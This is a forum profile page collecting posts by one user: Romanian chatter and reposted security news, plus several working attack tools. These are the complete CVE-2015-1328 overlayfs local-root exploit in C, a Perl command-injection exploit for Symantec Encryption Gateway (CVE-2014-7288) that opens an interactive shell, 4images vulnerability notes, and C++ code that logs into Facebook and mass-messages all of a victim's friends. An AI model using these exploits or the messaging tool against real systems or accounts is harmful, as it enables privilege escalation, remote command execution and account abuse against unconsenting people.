Jump to content


Active Members
  • Posts

  • Joined

  • Last visited

  • Days Won


Everything posted by Aerosol

  1. vreau dovezi ca am facut asa ceva, niciodata in viata mea nu am dat nimic de la vip nici macar titluri thread. Pentru ce am primit remove? Ati bagat motive de rahat cum ca am facut leak cand defapt nu am zis nici macar titluri de acolo si puteti verifica oriunde. Daca voi dati o dovada cum ca eu am facut asa ceva EU personal CER BAN PERMANENT!!
  2. Iceman zis si "ScanMu0Ster" "mai toate parolele erau 123456 " ( un lucru cu care SIGUR te poti lauda ) Micul Fum si mai rau... Edit x2:// Ca un om inteligent ce a fost Iceman si-a lasati si mail-ul de contact dupa ce i-a "spart"... Va mai aduceti aminte de "deface-urile" date de copiii site-urilor de gaming. "You website was hacked... Contact me at: **** " asa si asta... De ce rahat au luat interviu ratatilor de scammeri ce pacalesc oamenii pe ebay? De cand e asta "hacking" ? Mdeah m-am convins si de Norton. Si de ce tot apar preotii si biserica in video, ce vor sa demonstreze ca-s oamenii cu frica lui Dumnezeu? Adica se roaga "Doamne sa nu ma ia garda"?
  3. Her computer was used to spread Trojan, it is claimed The recent cyberattack on the German government began with the compromise of Chancellor Angela Merkel's personal computer, it is alleged. German newspaper Bild claims Merkel's computer was one of the first systems to be infected with malware linked to miscreants in Russia. Hackers reportedly used Merkel's computer to send messages to other targets in order to further spread a Trojan throughout the German government. The newspaper did not mention how Merkel herself may have been infected. The infection eventually spread throughout the German Bundestag, and was traced back to hackers based in Russia. The German administration has refused to point the finger of blame publicly. The attack reportedly compromised roughly 20,000 systems, and put lawmakers' documents at the fingertips of the infiltrators. It has yet to be confirmed whether the hackers were physically located in Russia or using a proxy in the Putin-led nation, and whether the activity took place with the knowledge of Russian authorities. Russia wouldn't be the first foreign government to pwn Merkel's gear. Earlier this year the NSA was found to have tapped the phone of the German chancellor to gather intelligence. Source
  4. Microsoft product manager Duane Forrester says it will encrypt all Bing search traffic later this year. Forrester says the move follows Cupertino's 2014 decision to allow users to opt-in to HTTPS for web searches. "Beginning this (Northern hemisphere) summer, we will begin the process of encrypting search traffic by default," Forrester blogged. "This means that traffic originating from Bing will increasingly come from https as opposed to http." Microsoft will also drop query search terms from referrers strings in a bid to further shore up privacy. Web ad bods will be able to learn the queries that lead users to their pages through Microsoft's search terms report, universal event tracking, and webmaster tools. " While this change may impact marketers and webmasters, we believe that providing a more secure search experience for our users is important," Forrester says. The HTTPS move brings Microsoft up to speed with Google which began encrypting search traffic in 2011 making it compulsory in 2013, and Yahoo! which deployed HTTPS for its search in 2014. Encrypting search traffic and other non-sensitive web traffic is seen widely by privacy and security pundits as necessary to a more safer web. Source
  5. Facebook is being taken to court by the Belgian privacy commissioner over claims it tracks people across the web. The country's Privacy Protection Commission (CPP) also accused Facebook of tracking the browsing habits of non-users, as well as its own members. The action follows criticism of Facebook by the same body in May. Facebook said it was surprised that the CPP had taken the "theatrical action" because it was due to meet the watchdog this week to discuss its concerns. The CPP said it took the decision because Facebook did not provide "satisfactory answers" to the questions it raised last month, according to a spokeswoman. The commission, which is working with German, Dutch, French and Spanish counterparts, accused Facebook of trampling on European privacy laws. A Facebook spokesman said: "We were surprised and disappointed that, after the [CPP] had already agreed to meet with us on 19 June to discuss their recommendations, they took the theatrical action of bringing Facebook Belgium to court on the day beforehand. "Although we are confident that there is no merit to the [CPP]'s case, we remain happy to work with them in an effort to resolve their concerns, through a dialogue with us at Facebook Ireland and with our regulator, the Irish Data Protection Commissioner." The commission has asked the court for an immediate order banning Facebook from monitoring non-users in particular, which it may do via plug-ins or cookies. In the past, Facebook has claimed that the Belgian commission's jurisdiction is "unclear" because the American firm is regulated in Europe by the Irish Data Protection Commissioner. It also defended its actions when the Belgian commission released its report last month, saying that most websites used cookies, which it said has been an "industry standard for more than 15 years". Source
  6. The nation’s first ever criminal case involving a hijacked wireless Internet connection came to light this month, prompting online security experts to warn that home Wi-Fi routers may be open to attack if not properly protected. Users need to set a password and switch on encryption, or their network can be hacked within minutes by someone close enough to eavesdrop on the wireless signal, such as a user in an adjacent apartment, said Yuichi Nozawa, a consultant with the government-affiliated Information-technology Promotion Agency (IPA), a body that advises on digital security. Cracking the security itself is relatively simple for one common form of encryption and can be done using free software. The IPA delivered the warning last Friday, a day after the rearrest of a man suspected of tapping into a nearby Wi-Fi network in Matsuyama, Ehime Prefecture. Hirofumi Fujita, 30, is separately on trial for allegedly stealing ¥16 million by obtaining online banking IDs and passwords as well as sending computer viruses to gain unauthorized remote access to other people’s computers. Moreover, the agency warned that hackers can use hijacked wireless networks to hide their identities, leading “even ordinary people with no criminal intention” to become the main suspects in cybercrimes, Nozawa said Monday. He said police sometimes identify suspects by the Internet access point used. A further problem lies in the fact that it is not easy for ordinary users to detect if their network has been hacked, he said. Many users remain unaware of the risks. In 2014, the IPA reported that more than 50 percent of households either had not set password protection on their home wireless network or were unsure whether it was active. But even if a wireless network is password-protected, it needs to use a newer form of encryption, as older ones can be cracked fairly easily. Older routers may offer Wired Equivalent Privacy (WEP) encryption as the default setting, which Nozawa said can be hacked. The alleged Ehime hacker is suspected of using this technique, deploying software that came as a free gift with an IT security magazine. Instead, Nozawa recommends using Wi-Fi Protected Access II, better known as WPA2, a higher form of encryption and one usually offered by newer network devices. The IPA recommends contacting manufacturers’ support teams to find out how to configure the security settings, as the procedure varies from device to device. Source
  7. Keychains raided, sandboxes busted, passwords p0wned, but Apple silent for six months Six university researchers have revealed deadly zero-day flaws in Apple's iOS and OS X, claiming it is possible to crack Apple's password-storing keychain, break app sandboxes, and bypass its App Store security checks. Attackers can exploit these bugs to steal passwords from installed apps, including the native email client, without being detected. The team was able to upload malware to Apple's app stores, and passed the vetting processes without triggering any alarms. That malware, when installed on a victim's Mac, raided the keychain to steal passwords for services including iCloud and the Mail app, and all those stored within Google Chrome. Lead researcher Luyi Xing told El Reg he and his team complied with Apple's request to withhold publication of the research for six months, but had not heard back as of the time of writing. They say the holes are still present in Apple's software, meaning their work will likely be consumed by miscreants looking to weaponize the work. Apple was not available for immediate comment. The Indiana University boffins Xing; Xiaolong Bai; XiaoFeng Wang; and Kai Chen joined Tongxin Li, of Peking University, and Xiaojing Liao, of Georgia Institute of Technology, to develop the research, which is detailed in a paper titled Unauthorized Cross-App Resource Access on Mac OS X and iOS. "Recently we discovered a set of surprising security vulnerabilities in Apple's Mac OS and iOS that allows a malicious app to gain unauthorised access to other apps' sensitive data such as passwords and tokens for iCloud, Mail app and all web passwords stored by Google Chrome," Xing told The Register's security desk. "Our malicious apps successfully went through Apple’s vetting process and was published on Apple’s Mac app store and iOS app store. "We completely cracked the keychain service - used to store passwords and other credentials for different Apple apps - and sandbox containers on OS X, and also identified new weaknesses within the inter-app communication mechanisms on OS X and iOS which can be used to steal confidential data from Evernote, Facebook and other high-profile apps." The team was able to raid banking credentials from Google Chrome on the latest OS X 10.10.3, using a sandboxed app to steal the system's keychain data and secret iCloud tokens, and passwords from password vaults. Photos were stolen from WeChat, and the token for popular cloud service Evernote was nabbed, allowing it to be fully compromised. "The consequences are dire," the team wrote in the paper. Some 88.6 per cent of 1,612 OS X and 200 iOS apps were found "completely exposed" to unauthorized cross-app resource access (XARA) attacks allowing malicious apps to steal otherwise secure data. Xing says he reported the flaws to Apple in October 2014. Apple security bods responded to the researchers in emails seen by El Reg expressing understanding for the gravity of the attacks, and asked for at least six months to fix the problems. In February, the Cupertino staffers requested an advanced copy of the research paper. Google's Chromium security team was more responsive, and removed keychain integration for Chrome, noting that it could likely not be solved at the application level. AgileBits, owner of popular software 1Password, said it could not find a way to ward off the attacks nor make the malware "work harder" some four months after it was warned of the vulnerabilities. ("Neither we nor Luyi Xing and his team have been able to figure out a completely reliable way to solve this problem," said AgileBits's Jeffrey Goldberg in a blog post today.) The team's work into XARA attacks is the first of its kind; Apple's app isolation mechanisms are supposed to stop malicious apps from raiding each other. The researchers found "security-critical vulnerabilities" including cross-app resource-sharing mechanisms and communications channels such as the keychain, WebSocket and Scheme. "Note that not only does our attack code circumvent the OS-level protection but it can also get through the restrictive app vetting process of the Apple Stores, completely defeating its multi-layer defense," the researchers wrote in the paper. They say almost all XARA flaws arise from Apple's cross-app resource sharing and communication mechanisms such as keychain for sharing passwords, BID based separation, and URL scheme for app invocation, which is different from how the Android system works. Their research, previously restricted to Android, would lead to a new line of work for the security community studying how the vulnerabilities affect Apple and other platforms. Here's the boffins' description of their work: Source
  8. Older versions of the Ask.com toolbar will be automatically identified as malware and removed by Microsoft security programs as part of a larger effort to banish unwanted software, the company said in an advisory. Last month the company said that Windows Defender, Microsoft Security Essentials and Microsoft Security will now target programs that use browser search protection in a release. Browser and search protection code are used by programs like the Ask.com toolbar to make it difficult to change or remove default settings and browser functions. These programs will be detected as "unwanted software" regardless of the whether or not the code is active. Last year the tech giant said that it will change its evaluation criteria to recognize products as malware if they prevent or limit users' control over their browser search settings. To avoid detection, developers are urged to remove all search prevention code from their software. Microsoft confirmed in a release that the newest version of Ask.com toolbar won't be considered malware, it's actions only apply to older versions. A limited number of outdated Ask.com toolbars still include the legacy search protection feature, which alerts users to third party software attempting to change their settings. Microsoft recommended that users who suspect that their toolbars are outdated restart their browsers and to see if they have the current working version. Source
  9. The overlayfs filesystem does not correctly check file permissions when creating new files in the upper filesystem directory. This can be exploited by an unprivileged process in kernels with CONFIG_USER_NS=y and where overlayfs has the FS_USERNS_MOUNT flag, which allows the mounting of overlayfs inside unprivileged mount namespaces. This is the default configuration of Ubuntu 12.04, 14.04, 14.10, and 15.04 [1]. If you don't want to update your kernel and you don't use overlayfs, a viable workaround is to just remove or blacklist overlayfs.ko / overlay.ko. Details ================================ >From Documentation/filesystems/overlayfs.txt [2]: "Objects that are not directories (files, symlinks, device-special files etc.) are presented either from the upper or lower filesystem as appropriate. When a file in the lower filesystem is accessed in a way the requires write-access, such as opening for write access, changing some metadata etc., the file is first copied from the lower filesystem to the upper filesystem (copy_up)." The ovl_copy_up_* functions do not correctly check that the user has permission to write files to the upperdir directory. The only permissions that are checked is if the owner of the file that is being modified has permission to write to the upperdir. Furthermore, when a file is copied from the lowerdir the file metadata is carbon copied, instead of attributes such as owner being changed to the user that triggered the copy_up_* procedures. Example of creating a 1:1 copy of a root-owned file: (Note that the workdir= option is not needed on older kernels) user@...ntu-server-1504:~$ ./create-namespace root@...ntu-server-1504:~# mount -t overlay -o lowerdir=/etc,upperdir=upper,workdir=work overlayfs o root@...ntu-server-1504:~# chmod 777 work/work/ root@...ntu-server-1504:~# cd o root@...ntu-server-1504:~/o# mv shadow copy_of_shadow (exit the namespace) user@...ntu-server-1504:~$ ls -al upper/copy_of_shadow -rw-r----- 1 root shadow 1236 May 24 15:51 upper/copy_of_shadow user@...ntu-server-1504:~$ stat upper/copy_of_shadow /etc/shadow|grep Inode Device: 801h/2049d Inode: 939791 Links: 1 Device: 801h/2049d Inode: 277668 Links: 1 Now we can place this file in /etc by switching "upper" to be the lowerdir option, the permission checks pass since the file is owned by root and root can write to /etc. user@...ntu-server-1504:~$ ./create-namespace root@...ntu-server-1504:~# mount -t overlay -o lowerdir=upper,upperdir=/etc,workdir=work overlayfs o root@...ntu-server-1504:~# chmod 777 work/work/ root@...ntu-server-1504:~# cd o root@...ntu-server-1504:~/o# chmod 777 copy_of_shadow root@...ntu-server-1504:~/o# exit user@...ntu-server-1504:~$ ls -al /etc/copy_of_shadow -rwxrwxrwx 1 root shadow 1236 May 24 15:51 /etc/copy_of_shadow The attached exploit gives a root shell by creating a world-writable /etc/ld.so.preload file. The exploit has been tested on the most recent kernels before 2015-06-15 on Ubuntu 12.04, 14.04, 14.10 and 15.04. It is also possible to list directory contents for any directory on the system regardless of permissions: nobody@...ntu-server-1504:~$ ls -al /root ls: cannot open directory /root: Permission denied nobody@...ntu-server-1504:~$ mkdir o upper work nobody@...ntu-server-1504:~$ mount -t overlayfs -o lowerdir=/root,upperdir=/home/user/upper,workdir=/home/user/work overlayfs /home/user/o nobody@...ntu-server-1504:~$ ls -al o 2>/dev/null total 8 drwxrwxr-x 1 root nogroup 4096 May 24 16:33 . drwxr-xr-x 8 root nogroup 4096 May 24 16:33 .. -????????? ? ? ? ? ? .bash_history -????????? ? ? ? ? ? .bashrc d????????? ? ? ? ? ? .cache -????????? ? ? ? ? ? .lesshst d????????? ? ? ? ? ? linux-3.19.0 Credit ================================ Philip Pettersson, Samsung SDS Security Center References ================================ [1] https://git.launchpad.net/~ubuntu-kernel/ubuntu/+source/linux/+git/vivid/commit/?id=78ec4549 [2] https://www.kernel.org/doc/Documentation/filesystems/overlayfs.txt [3] http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html -------------- /* # Exploit Title: ofs.c - overlayfs local root in ubuntu # Date: 2015-06-15 # Exploit Author: rebel # Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15) # Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04 # CVE : CVE-2015-1328 (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html) *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=* CVE-2015-1328 / ofs.c overlayfs incorrect permission handling + FS_USERNS_MOUNT user@ubuntu-server-1504:~$ uname -a Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux user@ubuntu-server-1504:~$ gcc ofs.c -o ofs user@ubuntu-server-1504:~$ id uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev) user@ubuntu-server-1504:~$ ./ofs spawning threads mount #1 mount #2 child threads done /etc/ld.so.preload created creating shared library # id uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user) greets to beist & kaliman 2015-05-24 %rebel% *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=* */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sched.h> #include <sys/stat.h> #include <sys/types.h> #include <sys/mount.h> #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sched.h> #include <sys/stat.h> #include <sys/types.h> #include <sys/mount.h> #include <sys/types.h> #include <signal.h> #include <fcntl.h> #include <string.h> #include <linux/sched.h> #define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n return _real_getuid();\n}\n" static char child_stack[1024*1024]; static int child_exec(void *stuff) { char *file; system("rm -rf /tmp/ns_sploit"); mkdir("/tmp/ns_sploit", 0777); mkdir("/tmp/ns_sploit/work", 0777); mkdir("/tmp/ns_sploit/upper",0777); mkdir("/tmp/ns_sploit/o",0777); fprintf(stderr,"mount #1\n"); if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) { // workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) { fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n"); exit(-1); } file = ".access"; chmod("/tmp/ns_sploit/work/work",0777); } else file = "ns_last_pid"; chdir("/tmp/ns_sploit/o"); rename(file,"ld.so.preload"); chdir("/"); umount("/tmp/ns_sploit/o"); fprintf(stderr,"mount #2\n"); if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) { if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) { exit(-1); } chmod("/tmp/ns_sploit/work/work",0777); } chmod("/tmp/ns_sploit/o/ld.so.preload",0777); umount("/tmp/ns_sploit/o"); } int main(int argc, char **argv) { int status, fd, lib; pid_t wrapper, init; int clone_flags = CLONE_NEWNS | SIGCHLD; fprintf(stderr,"spawning threads\n"); if((wrapper = fork()) == 0) { if(unshare(CLONE_NEWUSER) != 0) fprintf(stderr, "failed to create new user namespace\n"); if((init = fork()) == 0) { pid_t pid = clone(child_exec, child_stack + (1024*1024), clone_flags, NULL); if(pid < 0) { fprintf(stderr, "failed to create new mount namespace\n"); exit(-1); } waitpid(pid, &status, 0); } waitpid(init, &status, 0); return 0; } usleep(300000); wait(NULL); fprintf(stderr,"child threads done\n"); fd = open("/etc/ld.so.preload",O_WRONLY); if(fd == -1) { fprintf(stderr,"exploit failed\n"); exit(-1); } fprintf(stderr,"/etc/ld.so.preload created\n"); fprintf(stderr,"creating shared library\n"); lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777); write(lib,LIB,strlen(LIB)); close(lib); lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w"); if(lib != 0) { fprintf(stderr,"couldn't create dynamic library\n"); exit(-1); } write(fd,"/tmp/ofs-lib.so\n",16); close(fd); system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c"); execl("/bin/su","su",NULL); } Source
  10. | # Title : 4images 1.7.11 Multi Vulnerability | # Author : indoushka | # email : indoushka4ever@gmail.com | # Dork : Powered by 4images 1.7.11 | # Tested on: windows 8.1 Français V.(Pro) | # Download : http://www.4homepages.de/ ======================================= Host Header Attack : Vulnerability description : An attacker can manipulate the Host header as seen by the web application and cause the application to behave in unexpected ways. Developers often resort to the exceedingly untrustworthy HTTP Host header (_SERVER["HTTP_HOST"] in PHP). Even otherwise-secure applications trust this value enough to write it to the page without HTML-encoding it with code equivalent to: <link href="http://_SERVER['HOST']" This vulnerability affects /4images/index.php. Host header evilhostKdK2IXPv.com was reflected inside a LINK tag (href attribute). Poc : R/L File inclusion : C:\web\www\4images\global.php LIne 400 : include_once(ROOT_PATH.'includes/db_'.strtolower($db_servertype).'.php'); Function : include_once Variables : $db_servertype Poc : Greetz : jericho http://attrition.org & http://www.osvdb.org/ * packetstormsecurity.com * http://is-sec.org/cc/ Hussin-X * Stake (www.v4-team.com) * D4NB4R * ViRuS_Ra3cH * yasMouh * https://www.corelan.be * exploit4arab.net --------------------------------------------------------------------------------------------------------------- Source
  11. #!/usr/bin/perl -w use LWP::UserAgent; # Vantage Point Security Advisory 2014-007 # Title: Symantec Encryption Management Server - Remote Command Injection Exploit # CVE: CVE-2014-7288 # Vendor: Symantec # Affected Product: Symantec Encryption Gateway # Affected Versions: < 3.2.0 MP6 # Product Website: http://www.symantec.com/en/sg/gateway-email-encryption/ # Exploit Info : https://www.exploit-db.com/exploits/35949/ # Author: Mohammad Reza Espargham # Linkedin : https://ir.linkedin.com/in/rezasp # E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com # Website : www.reza.es # Twitter : https://twitter.com/rezesp # FaceBook : https://www.facebook.com/mohammadreza.espargham if (($#ARGV + 1) != 1) { printf " Usage: \n \t$0 <Target>\n"; printf "\t$0 http://target.com/\n\n"; exit(1); } chomp($target=$ARGV[0]); if($target !~ /http:\/\//) { $target = "http://$target"; } my $ua = LWP::UserAgent->new; $ua->timeout(10); my $url = "$target/omc/uploadBackup.event"; for( { print "shell : "; chomp($cmd=<STDIN>); my $response = $ua->post( $url, Content_Type => 'form-data', name => "file", Content => [ filename => "test123|`$cmd`|-whatever.tar.gz.pgp" ] ); print "\n".$response->content; } Source
  12. Aerosol

    Fun stuff

    ala e @AerosoI nu Aerosol. Probabil vre-un troll cu chef de glume.
  13. Produs: Imprimanta Epson Stylus S22 ( Color ) Pretul din magazin este de 459,00 RON, eu cer doar 200 RON. Stare: Noua ( nu o am de mult timp + ca am folosito doar o data si cum nu am ce face cu ea am zis sa o unui membru rst ce are nevoie de ea ) OFERTA VALABILA DOAR PENTRU CEI CARE STAU IN BUCURESTI. Stabilim unde sa ne intalnim si cine stie poate mergem la o bere dupa. Mentionez ca, cartusele nu sunt incluse. Imagine cu imprimanta: Am gasit cumparator. TC!
  14. Aerosol


    Felicitari, sa ne spui si noua unde era dupa ce se rezolva.
  15. Login to account with provided username/password, extract friends list, send messages to them all. Requires: curl, and gumbo. Enjoy. #include <stdio.h> #include <curl/curl.h> #include <iostream> #include <cstring> #include <vector> #include "gumbo.h" using namespace std; CURL *curl; CURLcode res; string data; string fb_dtsg; vector<string> friends; struct curl_httppost *formpost=NULL; struct curl_httppost *lastptr=NULL; struct curl_httppost *msgform=NULL; struct curl_httppost *msglast=NULL; static size_t curl_write( void *ptr, size_t size, size_t nmemb, void *stream) { data.append( (char*)ptr, size*nmemb ); return size*nmemb; }; string replace_all(string str, const string& from, const string& to) { size_t start_pos = 0; while((start_pos = str.find(from, start_pos)) != std::string::npos) { str.replace(start_pos, from.length(), to); start_pos += to.length(); } return str; } string string_between( string str, const string& delim1, const string& delim2 ) { unsigned first = str.find(delim1); unsigned last = str.find(delim2); string out = str.substr (first,last-first); return out; } int curl_check_cookie_response( ) { struct curl_slist *cookies; struct curl_slist *nc; int i; res = curl_easy_getinfo(curl, CURLINFO_COOKIELIST, &cookies); if (res == CURLE_OK) { nc = cookies, i = 1; while (nc) { if(strstr( nc->data, "c_user") != NULL ) return 0; nc = nc->next; i++; } } curl_slist_free_all(cookies); return 1; } int authenticate_details( const char* email, const char* password ) { curl_easy_setopt(curl, CURLOPT_URL, "https://m.facebook.com/login.php" ); curl_easy_setopt( curl, CURLOPT_USERAGENT, "Mozilla/5.0 (X11; sludg3; Linux i686; rv:26.0) Gecko/20100101 Firefox/26.0"); curl_easy_setopt( curl, CURLOPT_FOLLOWLOCATION, 2L ); curl_easy_setopt( curl, CURLOPT_VERBOSE, 0 ); curl_easy_setopt( curl, CURLOPT_COOKIEFILE, ""); curl_easy_setopt( curl, CURLOPT_COOKIEJAR, "cookies.txt" ); curl_formadd(&formpost, &lastptr, CURLFORM_COPYNAME, "email", CURLFORM_COPYCONTENTS, email, CURLFORM_END); curl_formadd(&formpost, &lastptr, CURLFORM_COPYNAME, "pass", CURLFORM_COPYCONTENTS, password, CURLFORM_END); curl_easy_setopt(curl, CURLOPT_HTTPPOST, formpost); curl_easy_setopt( curl, CURLOPT_WRITEFUNCTION, curl_write ); if( curl_easy_perform(curl) == CURLE_OK ) { return 0; } return 1; } void gumbo_parse_friend_data( GumboNode* node ) { GumboAttribute* url; if (node->type != GUMBO_NODE_ELEMENT) { return; } if (node->v.element.tag == GUMBO_TAG_A && (url = gumbo_get_attribute(&node->v.element.attributes, "href"))) { if( strstr( url->value, "?uid=" ) != NULL ) { data = string_between( url->value, "=", "&" ); data = replace_all( data, "=", ""); friends.push_back( data ); } } GumboVector* children = &node->v.element.children; for (unsigned int i = 0; i < children->length; ++i) { gumbo_parse_friend_data(static_cast<GumboNode*>(children->data[i])); } } void gumbo_parse_session_id ( GumboNode* node ) { GumboAttribute* inputName; GumboAttribute* inputValue; if (node->type != GUMBO_NODE_ELEMENT) { return; } if (node->v.element.tag == GUMBO_TAG_INPUT ) { inputName = gumbo_get_attribute( &node->v.element.attributes, "name" ); inputValue = gumbo_get_attribute( &node->v.element.attributes, "value" ); if( inputValue != NULL && inputName != NULL) { std::string val( inputName->value ); std::size_t match = val.find( "fb_dtsg" ); if( match == 0 ) { fb_dtsg = inputValue->value; } } } GumboVector* children = &node->v.element.children; for (unsigned int i = 0; i < children->length; ++i) { gumbo_parse_session_id(static_cast<GumboNode*>(children->data[i]) ); } } int grab_friends_list_data( ) { curl_easy_setopt(curl, CURLOPT_URL, "https://m.facebook.com/friends/center/friends" ); if( curl_easy_perform(curl) == CURLE_OK ) { GumboOutput* output = gumbo_parse(data.c_str()); gumbo_parse_friend_data( output->root); return 0; } return 1; } int grab_friend_session( string friend_id ) { char url[512]; snprintf( url, sizeof( url ), "https://m.facebook.com/messages/thread/%s", friend_id.c_str() ); curl_easy_setopt( curl, CURLOPT_URL, url ); if( curl_easy_perform(curl) == CURLE_OK ) { GumboOutput* output = gumbo_parse(data.c_str()); gumbo_parse_session_id( output->root); return 0; } return 1; } int send_message_to_friend( string friend_id, string message ) { char field[ 32 ], value[ 32 ]; snprintf( field, sizeof( field ), "ids[%s]", friend_id.c_str() ); snprintf( value, sizeof( value ), "%s", friend_id.c_str() ); curl_easy_setopt( curl, CURLOPT_URL, "https://m.facebook.com/messages/send/?icm=1" ); curl_formadd(&msgform, &msglast, "fb_dtsg", CURLFORM_COPYCONTENTS, fb_dtsg.c_str(), CURLFORM_END); curl_formadd(&msgform, &msglast, CURLFORM_COPYNAME, field, CURLFORM_COPYCONTENTS, value, CURLFORM_END); curl_formadd(&msgform, &msglast, CURLFORM_COPYNAME, "body", CURLFORM_COPYCONTENTS, message.c_str(), CURLFORM_END); curl_easy_setopt( curl, CURLOPT_HTTPPOST, msgform ); if( curl_easy_perform(curl) == CURLE_OK ) { return 0; } return 1; } void cleanup( ) { data = ""; } int main( int argc, char *argv[] ) { curl = curl_easy_init(); if(curl) { if( authenticate_details( "message@allyourfriends.com", "thepassword" ) == 0 ) { if( curl_check_cookie_response() == 0 ) { printf("We are logged in."); if( grab_friends_list_data() == 0 ) { for(vector<int>::size_type i = 0; i != friends.size(); i++) { printf( "Sending message to friend ID: %s\r\n", friends[i].c_str() ); if( grab_friend_session( friends[i].c_str() ) == 0 ) { send_message_to_friend( friends[i].c_str(), "hi"); } } } } else { printf("Failed to login."); } } } return 0; } P.S:// Nu l-am testat! Credit's to: sludg3@tf @kNigHt done.
  16. Remote code execution for some, denial of service for the rest of us Cisco has issued a string of patches for 16 faults including a fix for a possible remote code execution in its IOS and IOS XE routing software. The patches address a generous dollop of security conditions caused by faulty queued packets. One flaw, rated severity 8.3, allows attackers to gain remote code execution in IOS XE by sending a crafted packet that allows code to run on affected boxes. Attackers could also send crafted packets to trigger denial of service. "A vulnerability in the AppNav component of Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause an affected device to reload and may allow arbitrary code execution on the affected system," Cisco says in its advisory. "The vulnerability is due to improper processing of crafted TCP packets. An attacker could exploit this vulnerability by sending a crafted TCP packet that needs to be processed by the AppNav component configured on an affected device. An exploit could allow the attacker to cause an affected device to reload or execute arbitrary code in the forwarding engine." Another fix addresses flaws that allow attackers to spoof Autonomic Networking Registration Authority response thanks to lax message validation "A successful exploit could allow an attacker to bootstrap a device into an untrusted autonomic domain, gaining limited command and control of the AN node, causing a denial of service condition and disrupting access to the legitimate autonomic domain," Cisco says . Further vulnerabilities coupled in that advisory lead to denial of service conditions. The Borg also closed off a medium-severity vulnerability (CVE-2015-0769) in the IOS XR carrier software rated 5 can be easily exploited by attackers sending a packet that would thanks to IPv6 extension headers trigger denial of service. It says this occurs because the headers are not typical of normal operation and says there are no work-arounds for the flaw meaning affected systems will require the patch. "A vulnerability in the IP version 6 processing code of Cisco IOS XR Software for Cisco CRS-3 Carrier Routing System could allow an unauthenticated, remote attacker to trigger an ASIC scan of the Network Processor Unit and a reload of the line card processing an IPv6 packet," it says in an advisory. "The vulnerability is due to incorrect processing of an IPv6 packet carrying IPv6 extension headers that are valid but unlikely to be seen during normal operation. "An attacker could exploit this vulnerability by sending such an IPv6 packet to an affected device that is configured to process IPv6 traffic." That exploit can cause a reload of the line card triggering repeated denial of service through transit traffic or data destined for the device. Affected Cisco IOS XR versions include 4.0.1; 40.2; 4.0.3; 4.0.4; 4.1.0; 4.1.1; 4.1.2, and 4.2.0. IOS XR Release 4.2.1 and later are not affected. Source
  17. Snapchat has deployed two factor authentication as part of its push to increase security across the popular selfie slinging app. The sexting swap shop allows users to set up SMS log-in verification that makes en-masse account hijacking more difficult, and better protects Snapchat's Snapcash money transfer system. The additional security measures are welcome, but devoted targeted attackers can still break into accounts by exploiting telecommunications providers' weak security identity checks to port phone numbers. Users of Snapchat version 9.9 will be able to activate the Login Verification feature on Android and iOS platforms. The extra security features are the latest efforts in a push to increase the platform's security chops which includes the launch of a HackerOne bug bounty, a regular transparency report, and the hiring of former Google social network security boss Jad Boutros as infosec head. Boutros has already said he aimsto build a "culture of security" at the company. The push follows Snapchat's legal trouble with the Federal Trade Commission stemming from incorrect claims photos and videos would "disappear forever" when it had remained on devices. The company also ran into trouble when some 4.6 million names and email addresses were breached in December 2013 after it dismissed that attack vector as theoretical. Source
  18. Aerosol

    Fun stuff

    Doamne.... )) ) Read more: Distractify | Pornhub Is Sending Two Porn Stars To Space For Exactly The Reason You Think
